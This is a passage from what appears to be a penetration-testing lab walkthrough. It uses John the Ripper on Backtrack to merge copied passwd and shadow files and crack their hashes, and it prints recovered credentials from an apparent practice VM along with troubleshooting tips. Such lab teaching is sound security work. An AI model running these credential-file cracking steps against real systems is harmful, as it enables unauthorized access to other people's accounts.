3. Open john directory in backtrack

root@bt:~# cd /pentest/passwords/john
root@bt:/pentest/passwords/john#

4. Convert and combine the saved Gedit passwd and shadow- to unshadowed

root@bt:/pentest/passwords/john#./unshadow /root/passwords/passwd /root/passwords/shadow- > /root/passwords/unshadowed

5. Run john against the combined unshadowed file to show username and passwords

root@bt:/pentest/passwords/john# ./john /root/passwords/unshadowed

Loaded 7 password hashes with 7 different salts (FreeBSD MD5 [32/32])
postgres (postgres)
user (user)
msfadmin (msfadmin)
service (service)
123456789 (klog)
batman (sys)

6. Drop the (from the password) exsample postgres (postgres)
username = postgres
password = postgres

After trying a few times we found a few issues so have included bellow to help troubleshoot.

The bellow shows nothing and says locked. Kill the john process in system monitor then rerun the program.

root@bt:/pentest/passwords/john# ./john /root/passwords/unshadowed2
Loaded 7 password hashes with 7 different salts (FreeBSD MD5 [32/32])
Remaining 1 password hash
Crash recovery file is locked: ./john.rec

The below runs but finds nothing. re run add -show switch

root@bt:/pentest/passwords/john# ./john /root/passwords/unshadowed2
Loaded 7 password hashes with 7 different salts (FreeBSD MD5 [32/32])
Remaining 1 password hash

[1]+ Stopped ./john /root/passwords/unshadowed2

Using -show switch

root@bt:/pentest/passwords/john# ./john -show /root/passwords/unshadowed2
sys:batman:3:3:sys:/dev:/bin/sh
klog:123456789:103:104::/home/klog:/bin/false
msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:user:1001:1001:just a user,111,,:/home/user:/bin/bash
